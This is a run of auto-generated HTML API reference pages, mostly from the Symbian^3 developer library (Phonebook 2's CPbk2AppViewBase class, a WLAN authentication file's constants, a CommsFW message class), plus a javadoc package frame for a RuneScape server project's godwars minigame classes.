href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ViewScreenDeviceChangedL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::~CAknView() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::CBase() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::Delete(CBase *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::Extension_(TUint,TAny *&amp;,TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TLeave) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TLeave,TUint) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TUint) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::~CBase() </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-019B2B8B-AFAA-3806-B796-3D91B4D79361.html"> CEikMenuBar </a> * </td> <td> <a href="#GUID-A63DAE8C-9CFE-33EC-8DC9-17B81AAA0136"> iPopup </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> CAknStylusPopUpMenu * </td> <td> <a href="#GUID-01F25006-A5FC-3A40-A92E-3AF91095D5EA"> iStylusPopup </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Attributes </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::iCoeEnv </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Constructor &amp; Destructor Documentation </h1> <div class="nested1" id="GUID-2223D3AE-74A0-34BD-87A2-1DD9EA3D8229"> <a name="GUID-2223D3AE-74A0-34BD-87A2-1DD9EA3D8229"> <!-- --> </a> <h2 class="topictitle2"> CPbk2AppViewBase() </h2> <table class="signature"> <tr> <td> IMPORT_C </td> <td> CPbk2AppViewBase </td> <td> ( </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> <div> <p> Constructor. </p> </div> </div> </div> <div class="nested1" id="GUID-0AF979F0-9602-3B6A-8674-22F0FA37094B"> <a name="GUID-0AF979F0-9602-3B6A-8674-22F0FA37094B"> <!-- --> </a> <h2 class="topictitle2"> ~CPbk2AppViewBase() </h2> <table class="signature"> <tr> <td> IMPORT_C </td> <td> ~CPbk2AppViewBase </td> <td> ( </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> <div> <p> Destructor. </p> </div> </div> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-3530F690-B259-3925-859B-98F08A67CC76"> <a name="GUID-3530F690-B259-3925-859B-98F08A67CC76"> <!-- --> </a> <h2 class="topictitle2"> AppViewBaseExtension(TUid) </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> * </td> <td> AppViewBaseExtension </td> <td> ( </td> <td> <a href="GUID-530281E6-29FC-33F2-BC9B-610FBA389444.html"> TUid </a> </td> <td> </td> <td> ) </td> <td> [protected, inline, virtual] </td> </tr> </table> <div class="section"> <div> <p> Returns an extension point for this interface or NULL. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-530281E6-29FC-33F2-BC9B-610FBA389444.html"> TUid </a> </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-1A46B692-0C80-36D9-BE33-6D45107D89C4"> <a name="GUID-1A46B692-0C80-36D9-BE33-6D45107D89C4"> <!-- --> </a> <h2 class="topictitle2"> ApplicationUid() </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-530281E6-29FC-33F2-BC9B-610FBA389444.html"> TUid </a> </td> <td> ApplicationUid </td> <td> ( </td> <td> ) </td> <td> const </td> </tr> </table> <div class="section"> <div> <p> Returns Phonebook 2's application uid. </p> <p> </p> </div> </div> </div> <div class="nested1" id="GUID-7D85CED1-C5ED-3A2B-A508-2418E404F88A"> <a name="GUID-7D85CED1-C5ED-3A2B-A508-2418E404F88A"> <!-- --> </a> <h2 class="topictitle2"> ClosePopup() </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> ClosePopup </td> <td> ( </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> <div> <p> Closes PopupMenu </p> </div> </div> </div> <div class="nested1" id="GUID-B0EC6224-E21A-3FD8-8724-B666E0D61553"> <a name="GUID-B0EC6224-E21A-3FD8-8724-B666E0D61553"> <!-- --> </a> <h2 class="topictitle2"> CloseStylusPopup() </h2> <table class="signature"> <tr> <td> void </td> <td> CloseStylusPopup </td> <td> ( </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-960E328F-827F-3CFC-BE5E-238EFA2F2632"> <a name="GUID-960E328F-827F-3CFC-BE5E-238EFA2F2632"> <!-- --> </a> <h2 class="topictitle2"> CreatePopupMenuL(TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> CreatePopupMenuL </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aResourceId </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aResourceId </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-27871A4C-186A-3AB6-A39C-69422C41157D"> <a name="GUID-27871A4C-186A-3AB6-A39C-69422C41157D"> <!-- --> </a> <h2 class="topictitle2"> DoLaunchPopupL(TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> DoLaunchPopupL </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aResourceId </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aResourceId </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-EC17AED1-A3F1-3012-9C35-315903A8A964"> <a name="GUID-EC17AED1-A3F1-3012-9C35-315903A8A964"> <!-- --> </a> <h2 class="topictitle2"> DoLaunchStylusPopupL(TInt, const TPoint &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> DoLaunchStylusPopupL </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aResourceId, </td> </tr> <tr> <td colspan="3"> </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPoint </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aResourceId </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPoint </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-45D95EA4-E1DF-35E1-BE7E-3ADD93A75486"> <a name="GUID-45D95EA4-E1DF-35E1-BE7E-3ADD93A75486"> <!-- --> </a> <h2 class="topictitle2"> GetMenuFilteringFlagsL() </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> GetMenuFilteringFlagsL </td> <td> ( </td> <td> ) </td> <td> const </td> </tr> </table> <div class="section"> <div> <p> Returns the menu filtering flags for the view. </p> <p> Pbk2MenuFilteringFlags.hrh for possible flags. </p> </div> </div> </div> <div class="nested1" id="GUID-9A7D9C38-0A8E-321A-A6A4-0FB32D933E32"> <a name="GUID-9A7D9C38-0A8E-321A-A6A4-0FB32D933E32"> <!-- --> </a> <h2 class="topictitle2"> GetViewSpecificMenuFilteringFlagsL() </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> GetViewSpecificMenuFilteringFlagsL </td> <td> ( </td> <td> ) </td> <td> const [protected, pure virtual] </td> </tr> </table> <div class="section"> <div> <p> Gets view specific menu filtering flags. </p> <p> </p> </div> </div> </div> <div class="nested1" id="GUID-CE5338BA-F854-3313-8695-6F79335380D3"> <a name="GUID-CE5338BA-F854-3313-8695-6F79335380D3"> <!-- --> </a> <h2 class="topictitle2"> HandleCommandKeyL(const TKeyEvent &amp;, TEventCode) </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> HandleCommandKeyL </td> <td> ( </td> <td> const <a href="GUID-0F8FA6A3-F172-36E4-9CF5-60814ABCD562.html"> TKeyEvent </a> &amp; </td> <td> aKeyEvent, </td> </tr> <tr> <td colspan="3"> </td> <td> TEventCode </td> <td> aType </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [protected, virtual] </td> </tr> </table> <div class="section"> <div> <p> Handles command keys application-side. </p> <p> <a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-5679D517-2106-3530-9BAA-9D9AB7CF6D06"> CCoeControl::OfferKeyEventL </a> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-0F8FA6A3-F172-36E4-9CF5-60814ABCD562.html"> TKeyEvent </a> &amp; aKeyEvent </td> <td> Key event as in CCoeControl::OfferKeyEventL. </td> </tr> <tr class="bg"> <td class="parameter"> TEventCode aType </td> <td> Key event type as in CCoeControl::OfferKeyEventL. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-0E6EFA90-DC4D-338A-8E76-7616F7D57FEA"> <a name="GUID-0E6EFA90-DC4D-338A-8E76-7616F7D57FEA"> <!-- --> </a> <h2 class="topictitle2"> HandleLongTapEventL(const TPoint &amp;, const TPoint &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> HandleLongTapEventL </td> <td> ( </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPenEventLocation, </td> </tr> <tr> <td colspan="3"> </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPenEventScreenLocation </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [protected, virtual] </td> </tr> </table> <div class="section"> <div> <p> Handles long tap pointer events. </p> <p> <a href="GUID-8ABC81C9-1D07-3D81-B744-BE5275ED61CA.html#GUID-8ABC81C9-1D07-3D81-B744-BE5275ED61CA"> MAknLongTapDetectorCallBack </a> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPenEventLocation </td> <td> Long tap event location relative to parent control. </td> </tr> <tr class="bg"> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPenEventScreenLocation </td> <td> Long tap event location relative to screen. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-86FD79B3-B82A-38EE-A3D9-A244135A03C0"> <a name="GUID-86FD79B3-B82A-38EE-A3D9-A244135A03C0"> <!-- --> </a> <h2 class="topictitle2"> HandlePointerEventL(const TPointerEvent &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> HandlePointerEventL </td> <td> ( </td> <td> const TPointerEvent &amp; </td> <td> aPointerEvent </td> <td> ) </td> <td> [protected, virtual] </td> </tr> </table> <div class="section"> <div> <p> Handles pointer events application-side. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const TPointerEvent &amp; aPointerEvent </td> <td> Pointer event. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-5F17E7DC-E143-3A39-BA61-2595E590ABA4"> <a name="GUID-5F17E7DC-E143-3A39-BA61-2595E590ABA4"> <!-- --> </a> <h2 class="topictitle2"> LaunchPopupMenuL(TInt) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> LaunchPopupMenuL </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aResourceId </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> <div> <p> Creates a pop up menubar of aResourceId. Runs DoLaunchPopupL inside a TRAP. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aResourceId </td> <td> Resource id of the popup. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-34E6D005-BEB1-3797-9A43-4AB333A06CBC"> <a name="GUID-34E6D005-BEB1-3797-9A43-4AB333A06CBC"> <!-- --> </a> <h2 class="topictitle2"> LaunchStylusPopupMenu2L(TInt, const TPoint &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C CAknStylusPopUpMenu &amp; </td> <td> LaunchStylusPopupMenu2L </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aResourceId, </td> </tr> <tr> <td colspan="3"> </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPoint </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> </td> </tr> </table> <div class="section"> <div> <p> Creates a given stylus pop up menu at the given screen coordinates. The only difference with LaunchStylusPopupMenuL is in return value. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aResourceId </td> <td> Resource id of the popup. </td> </tr> <tr class="bg"> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPoint </td> <td> The position where stylus was tapped. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-82439AFC-26D8-3086-B670-F65219E7C473"> <a name="GUID-82439AFC-26D8-3086-B670-F65219E7C473"> <!-- --> </a> <h2 class="topictitle2"> LaunchStylusPopupMenuL(TInt, const TPoint &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> LaunchStylusPopupMenuL </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aResourceId, </td> </tr> <tr> <td colspan="3"> </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPoint </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> </td> </tr> </table> <div class="section"> <div> <p> Creates a given stylus pop up menu at the given screen coordinates. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aResourceId </td> <td> Resource id of the popup. </td> </tr> <tr class="bg"> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPoint </td> <td> The position where stylus was tapped. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-DD95E5B4-44DE-3F88-B93D-CEC4726D76B8"> <a name="GUID-DD95E5B4-44DE-3F88-B93D-CEC4726D76B8"> <!-- --> </a> <h2 class="topictitle2"> Pbk2HandleLongTapEventL(const TPoint &amp;, const TPoint &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> Pbk2HandleLongTapEventL </td> <td> ( </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPenEventLocation, </td> </tr> <tr> <td colspan="3"> </td> <td> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; </td> <td> aPenEventScreenLocation </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPenEventLocation </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp; aPenEventScreenLocation </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-80308BF5-8EB1-3C7A-A363-27CE52E436C4"> <a name="GUID-80308BF5-8EB1-3C7A-A363-27CE52E436C4"> <!-- --> </a> <h2 class="topictitle2"> Pbk2ProcessKeyEventL(const TKeyEvent &amp;, TEventCode) </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> Pbk2ProcessKeyEventL </td> <td> ( </td> <td> const <a href="GUID-0F8FA6A3-F172-36E4-9CF5-60814ABCD562.html"> TKeyEvent </a> &amp; </td> <td> aKeyEvent, </td> </tr> <tr> <td colspan="3"> </td> <td> TEventCode </td> <td> aType </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-0F8FA6A3-F172-36E4-9CF5-60814ABCD562.html"> TKeyEvent </a> &amp; aKeyEvent </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> TEventCode aType </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-F86B7B3B-0796-3B4C-960C-FF852440390F"> <a name="GUID-F86B7B3B-0796-3B4C-960C-FF852440390F"> <!-- --> </a> <h2 class="topictitle2"> Pbk2ProcessPointerEventL(const TPointerEvent &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> Pbk2ProcessPointerEventL </td> <td> ( </td> <td> const TPointerEvent &amp; </td> <td> aPointerEvent </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const TPointerEvent &amp; aPointerEvent </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-0B8641E5-A7C6-3754-80F2-857AA25A1399"> <a name="GUID-0B8641E5-A7C6-3754-80F2-857AA25A1399"> <!-- --> </a> <h2 class="topictitle2"> ProcessCommandL(TInt) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> ProcessCommandL </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aCommand </td> <td> ) </td> <td> [private, virtual] </td> </tr> </table> <div class="section"> <div> <p> From <tt> <a href="GUID-CDB32ABA-F567-395D-9A00-2AC518BD5F3B.html#GUID-CDB32ABA-F567-395D-9A00-2AC518BD5F3B"> MEikMenuObserver </a> </tt> . This function processes user commands by handling <tt> aCommand </tt> values <tt> EAknSoftkeyOptions </tt> , <tt> EAknCmdExit </tt> , <tt> EEikCmdCanceled </tt> and passing the others to <tt> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html#GUID-3E736384-239F-345B-9067-906E37141079"> HandleCommandL() </a> </tt> for sub class to decide the actions. </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aCommand </td> <td> ID of the command to respond to. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-E2F6BDCC-680A-3DCF-844F-0C645A0C36D5"> <a name="GUID-E2F6BDCC-680A-3DCF-844F-0C645A0C36D5"> <!-- --> </a> <h2 class="topictitle2"> ViewStateLC() </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-EFFCFAA1-62A4-3618-B734-A1955237659F.html"> CPbk2ViewState </a> * </td> <td> ViewStateLC </td> <td> ( </td> <td> ) </td> <td> const [virtual] </td> </tr> </table> <div class="section"> <div> <p> Creates and returns an object containing this view's current state, which is used in view switching. </p> <p> </p> </div> </div> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-A63DAE8C-9CFE-33EC-8DC9-17B81AAA0136"> <a name="GUID-A63DAE8C-9CFE-33EC-8DC9-17B81AAA0136"> <!-- --> </a> <h2 class="topictitle2"> CEikMenuBar * iPopup </h2> <table class="signature"> <tr> <td> <a href="GUID-019B2B8B-AFAA-3806-B796-3D91B4D79361.html"> CEikMenuBar </a> * </td> <td> iPopup </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-01F25006-A5FC-3A40-A92E-3AF91095D5EA"> <a name="GUID-01F25006-A5FC-3A40-A92E-3AF91095D5EA"> <!-- --> </a> <h2 class="topictitle2"> CAknStylusPopUpMenu * iStylusPopup </h2> <table class="signature"> <tr> <td> CAknStylusPopUpMenu * </td> <td> iStylusPopup </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
doc/com/runescape/revised/content/minigame/godwars/package-frame.html
RodriguesJ/Atem
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Thu Jun 12 19:18:40 EDT 2014 --> <title>com.runescape.revised.content.minigame.godwars</title> <meta name="date" content="2014-06-12"> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> </head> <body> <h1 class="bar"><a href="../../../../../../com/runescape/revised/content/minigame/godwars/package-summary.html" target="classFrame">com.runescape.revised.content.minigame.godwars</a></h1> <div class="indexContainer"> <h2 title="Classes">Classes</h2> <ul title="Classes"> <li><a href="DyingKnight.html" title="class in com.runescape.revised.content.minigame.godwars" target="classFrame">DyingKnight</a></li> <li><a href="Entrance.html" title="class in com.runescape.revised.content.minigame.godwars" target="classFrame">Entrance</a></li> <li><a href="GodEquipment.html" title="class in com.runescape.revised.content.minigame.godwars" target="classFrame">GodEquipment</a></li> <li><a href="GodWarsMiniGame.html" title="class in com.runescape.revised.content.minigame.godwars" target="classFrame">GodWarsMiniGame</a></li> <li><a href="Letter.html" title="class in com.runescape.revised.content.minigame.godwars" target="classFrame">Letter</a></li> <li><a href="MainDungeon.html" title="class in com.runescape.revised.content.minigame.godwars" target="classFrame">MainDungeon</a></li> </ul> <h2 title="Enums">Enums</h2> <ul title="Enums"> <li><a href="GodType.html" title="enum in com.runescape.revised.content.minigame.godwars" target="classFrame">GodType</a></li> </ul> </div> </body> </html>
pdk/GUID-9F2E340B-7B0D-373C-8AD0-57B4D4E0DADB.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxFile"/> <meta name="DC.Title" content="eapol_am_wlan_authentication_symbian.cpp"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-9F2E340B-7B0D-373C-8AD0-57B4D4E0DADB"/> <title>eapol_am_wlan_authentication_symbian.cpp</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-9F2E340B-7B0D-373C-8AD0-57B4D4E0DADB"><a name="GUID-9F2E340B-7B0D-373C-8AD0-57B4D4E0DADB"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">eapol_am_wlan_authentication_symbian.cpp File Reference</h1> <div class="nested1" id="GUID-F2D7CFC0-E61B-34B2-B66D-33441248E6A4"><a name="GUID-F2D7CFC0-E61B-34B2-B66D-33441248E6A4"><!-- --></a> <h2 class="topictitle2">const TUint KMaxSqlQueryLength</h2> <table class="signature"><tr><td>const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint</a></td><td>KMaxSqlQueryLength</td></tr></table><div class="section"></div> </div> <div class="nested1" id="GUID-B777E266-AA45-30D1-8F49-737F2D050841"><a name="GUID-B777E266-AA45-30D1-8F49-737F2D050841"><!-- --></a> <h2 class="topictitle2">const TUint KMaxEapCueLength</h2> <table class="signature"><tr><td>const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint</a></td><td>KMaxEapCueLength</td></tr></table><div class="section"></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-FFFFCACA-DD29-3047-92B2-0F050A050C34.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="CommsFW::TCFBindCompleteMsg" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-FFFFCACA-DD29-3047-92B2-0F050A050C34" /> <title> CommsFW::TCFBindCompleteMsg </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-FFFFCACA-DD29-3047-92B2-0F050A050C34"> <a name="GUID-FFFFCACA-DD29-3047-92B2-0F050A050C34"> <!-- --> </a> <?php include_once 